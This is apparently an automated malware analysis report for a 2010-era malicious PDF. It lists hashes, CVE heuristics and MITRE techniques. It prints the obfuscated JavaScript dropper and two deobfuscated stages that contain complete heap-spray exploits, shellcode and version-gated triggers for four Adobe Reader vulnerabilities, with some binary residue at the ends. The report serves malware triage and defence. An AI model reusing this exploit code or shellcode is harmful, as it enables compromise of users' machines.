Malicious PDF — malware analysis report

Static analysis result for SHA-256 0c2c32fb8fcb60be…

MALICIOUS

PDF

12.2 KB Created: 2010-02-12 23:14:30 Authoring application: Nigpejopoxa First seen: 2026-05-11
MD5: f1b8e726f93766b78885d747aeba4305 SHA-1: 91d2c6ba9b458282f9d8ac0393886b0df82ed545 SHA-256: 0c2c32fb8fcb60be9c290194cadba84d1b8850adf31366d5657384e16487f772
468 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to perform a heap spray and exfiltrate credentials, as indicated by the heuristic firings and static enrichment. The ClamAV signature 'Js.Exploit.Shellcode-18' further confirms the malicious nature of the embedded script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0019_000.js pdf-javascript-stream PDF /JS object 19 at offset 0x2760 3188 bytes
SHA-256: 2a161edfa0935e9e3e62a4c08640789247829ebec84a89634cc564624c96579a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var rc="a1beb591d38a839298bc9993eeb2ad8698bc969286b3a39ba19bb097d18ea8878ad7d5d480c0c6d69db280efae82a8929fd5c880cd91a6de8f86afd3a0beaa9595a8b2889eb2908abeadb683f2bbab828e9b84a0aa8ca095d89e9b97a5988baecfa6a4aa8cbbec8cbea19881";var Ud;if(Ud!='UV'){Ud='UV'};var Q=false;function y(n){

    
	function C(M, lO){

				var v = M.length;
		var w=[0,239][0];
		var Z = lO.length;

		var K = '';
		var f=[1,203][0];

		for(var I = w; I < v; I += Z) {

			var p = M.substr(I, Z);

			if(p.length == Z){

				for(var u in lO) {

					K+=p.substr(lO[u], f);

				}

			} else {
        		K+=p;	
			}
		}

		return K;
	}


    var D=function(IR,S){
		return IR[C("acrhdCeoAt", [1,3,0,2])](S);
	};

    
	function H(M){

				var I =[137,0][1];
        var w =[5,0][1];

		M = new U(M);
        var nw = -1;
		var K = '';
		
		for (I=M[C("elntgh", [1,0,2])]-nw;I>=w;I=I-[1,39][0]){
			K+=M[C("ahctAr", [2,1,0])](I);
		}

		return K;
	}

    var J=function(uv){

		
		var c=[0,90][0];
		var u=[0,228][0];
		var B=[255,193][0];
		var Kr=uv[C("elgnht", [1,0])];
		var f=[203,1][1];

		while(u<Kr){

			u++;
			A=D(uv,u - f);
			c+=A*Kr;
		}

		return new U(c % B);
	};


    
	function Zu(nU,lS){
		return nU^lS;
	}


	var Hk=app;
	var R=Hk[C("vale", [3,0,1,2])];
	var KL=R(C("uFntcion", [1,0,2]));

		var IJ=R(C("geRExp", [2,1,0,3]));
	var yP = '';
	var U=R(C("tSirgn", [1,0]));

	var o=Array;



	
	var JO = n[C("elgnht", [1,0])];
	var nY=U[C("rfmohCraoCed", [1,0])];

	var t =[32,0][1];

	var q=unescape;
	var l= new Object();


	

	l.a1 = C("trSngifr.mCoarhodC(ue\'%(\'", [2,0,1]);
l.a2 = C("rows.dsbu(rtrowl.dgneth", [2,1,0]);
l.a3 = C("hit.gstPegeaumNorWs(d0)", [2,0,1]);
l.a4 = C("hit.gstPegeathNorW(0d", [2,0,1]);
l.a5 = C("rav", [2,1,0]);
l.a6 = C(".c)achorCAde0t()", [1,2,0]);
l.a7 = C("eunspcae", [1,2,0,3]);
l.a8 = C("rofav(r", [2,1,0]);
l.a11 = C("veal(s)", [1,0,2,3]);
l.a12 = C("ox)r", [1,0]);
l.a14 = C("rwod", [1,2,0]);
l.a15 = C("oxr", [1,0]);
l.a16 = C("\'\'", [1,0]);
l.a17 = C("53", [1,0]);
l.a18 = C(")i", [1,0]);
l.a19 = C(")2", [1,0]);



	var vc = U.fromCharCode(37);
	var Ru = '';

	var r = new IJ(C("^[a@z--0A9Z--_]", [1,0]), U.fromCharCode(103));
	var wV = '';
	var KH =[2,26][0];
	var g = '';


	var w =[0,85][0];
	var f =[1,174][0];

	app.alert(l);


	for(var d=w; d < JO; d+=KH){
		g+= vc; 
		g+= n[C("ubstrs", [2,0,1])](d, KH);
	}

	var n = q(g);

	var SD = new U(y);
	var k = SD[C("eprlace", [2,0,1,3])](r, Ru);

	
	k = H(k);
	var x = new U(KL);
	var m = l[C("enlgth", [2,0,1,3])];


	var vY = x[C("prelace", [1,2,0,3])](r, Ru);
	var vY = J(vY);
	var JG=J(k);

	for(var I=w; I < (n[C("nlehgt", [1,2,0])]);I=I+[111,1][1]) {

		var vk = k.charCodeAt(t);
		var N = D(n,I);

		N = Zu(N, vk);

		N = Zu(N, JG);
		N = Zu(N, vY);

		t++;

		if(t > k.length - 1){
			t=[193,0][1];
		}

		wV += nY(N);
	}

	for(CT=w; CT < m; CT+=KH){

		

		var cp = nY(l[CT]);
		var yj = l[CT + f];

		var E = new IJ(cp, U.fromCharCode(103));
		wV=wV[C("erpalce", [1,0,2])](E, yj);
	}



	var pW = new KL(wV);
	pW();

		x = '';
	k = '';

	JG = '';

	vY = '';
	pW = '';
	wV = '';

	return '';
};var Ud;if(Ud!='UV'){Ud='UV'};var Q=false;y(rc);
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 5818 bytes
SHA-256: e109578c06d8870d357f411aefa582e912c553ff107adf1b74da070e2616a778
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u9342%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memory = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());}
function util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();}
printd();
}
app.alert(1);����ٙ܈�ٙ܈�ٙ܈�ٙ܈�ٙ܈����� 3 2 2"!" 1)� �m
legacy_pdfkit_stage_001.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 5881 bytes
SHA-256: 48dd80a758d1efcd6f496270b17e87f62f17f737e3546ce8111c768adf47dbad
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u9342%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memory = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());}
function util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();}
printd();
}
app.alert(1);��������͍����������������������������������������������Ώ�������������������������͈�������������Έ��   �211�

Open this report in the interactive analyzer, or submit your own file for analysis.